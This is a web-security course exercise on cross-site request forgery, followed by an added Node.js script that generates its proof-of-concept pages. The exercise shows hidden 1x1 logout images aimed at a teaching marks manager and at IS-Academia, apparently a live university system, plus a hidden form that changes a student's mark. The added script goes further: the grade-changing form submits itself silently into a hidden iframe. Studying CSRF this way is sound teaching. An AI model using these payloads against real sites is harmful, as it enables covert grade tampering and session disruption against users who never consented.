Exercise: Cross Site Request Forgery - CSRF

Logout of the Marks manager

  • In your first file, insert the following code:
        Hello world
          <img src="https://www.benoist.ch/marksEsc/logout.php">
          
    This is not very impressive (only some menus disappear), since this application does not check very thoroughly whether the user is logged in.
    Unfortunately, a visitor can see that something is wrong with this page, since the image appears broken. We therefore shrink it to width=1, height=1.
  • The mail you write (in HTML) must contain the following:
          <img src="https://www.benoist.ch/marksEsc/logout.php" width="1" height="1">
        
    It will only work for people reading their mail inside their browser (i.e. webmail), because the browser then sends the victim's session cookie along with the image request.

Change marks inside the Marks Manager

  • We can create a first page that contains an iframe:
    <iframe src="form.php">
    </iframe>
      
    Then the form.php page that is referred to:
    
    Form 
    <form action='https://www.benoist.ch/marksEsc/enterMarks.php'
    method='POST'>
      <input type='hidden' name='courseID' value='1' />
      <input type='hidden' name='student8' value='2.0' />
      <input type='submit' value='Send marks' />
    </form>
      
  • If the admin visits that page and clicks on the button, they change the mark (field student8 is set to 2.0 for courseID 1) without noticing, since the form is submitted with the admin's own session.

IS-A

  • To log out of IS-Academia, insert the following code inside your page:
     <img
     src="https://is-a.bfh.ch/imoniteur_OPROAD/!logouts.out?ww_x_urlRedirect=">
     

    Test the solution: logout.isa.html.
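The three payloads of this exercise (the 1x1 logout image for the Marks manager, the same image trick for IS-Academia, and the hidden POST form for enterMarks.php) generated by a small Node.js script. This is an added example and not part of the course material; it goes one step beyond the exercise in that the form submits itself when the page loads and posts into a hidden iframe, so the admin does not have to click "Send marks" and the page they see keeps showing "Hello world". URLs, field names and values are the exercise's own; the file names logout.html and marks.html are assumptions (logout.isa.html is the name used above).

```javascript
// Added example, not part of the course page: generate the CSRF
// proof-of-concept pages of the exercise. Run with: node csrf_poc.js
// (it prints every page to stdout; save each one as its .html file and
// open it in a browser that is logged in to the target). URLs, field
// names and values are the exercise's own; the file names logout.html
// and marks.html are assumptions.

// Escape a value for safe placement inside a double-quoted HTML attribute,
// so that a field value containing quotes or angle brackets cannot break
// the generated page.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// GET-based CSRF: a 1x1 image whose src is the state-changing URL.
// The browser attaches the victim's cookies to the image request; the 1x1
// size hides the broken-image icon, as in the logout exercises.
function imageCsrf(url) {
  return `<img src="${escapeAttr(url)}" width="1" height="1" alt="">`;
}

// POST-based CSRF: one <input type="hidden"> per field, submitted by script
// as soon as the page loads, so the admin does not need to click "Send marks".
// The response goes into a hidden iframe so the page the victim sees does
// not visibly navigate away.
function autoSubmitForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n");
  return [
    `<iframe name="csrf-sink" style="display:none"></iframe>`,
    `<form id="csrf" action="${escapeAttr(action)}" method="POST" target="csrf-sink">`,
    inputs,
    `</form>`,
    `<script>document.getElementById("csrf").submit();</script>`,
  ].join("\n");
}

// Wrap a payload in the innocuous "Hello world" page of the exercise.
function csrfPage(payload) {
  return `<!DOCTYPE html>\n<html><body>\nHello world\n${payload}\n</body></html>\n`;
}

const MARKS_LOGOUT = "https://www.benoist.ch/marksEsc/logout.php";
const MARKS_ENTER = "https://www.benoist.ch/marksEsc/enterMarks.php";
const ISA_LOGOUT = "https://is-a.bfh.ch/imoniteur_OPROAD/!logouts.out?ww_x_urlRedirect=";

// The three pages of the exercise: two logout images and the marks form.
const pages = {
  "logout.html": csrfPage(imageCsrf(MARKS_LOGOUT)),
  "logout.isa.html": csrfPage(imageCsrf(ISA_LOGOUT)),
  "marks.html": csrfPage(autoSubmitForm(MARKS_ENTER, { courseID: "1", student8: "2.0" })),
};

for (const [name, html] of Object.entries(pages)) {
  console.log(`===== ${name} =====\n${html}`);
}
```

All three pages rely on the browser sending the victim's session cookie with a cross-site request. They stop working as soon as the target marks its session cookie SameSite=Lax or Strict (Lax already blocks the image and the POST, since neither is a top-level navigation), or checks an anti-CSRF token or the Origin header on enterMarks.php; checking for those is the first thing to do before spending time on a payload.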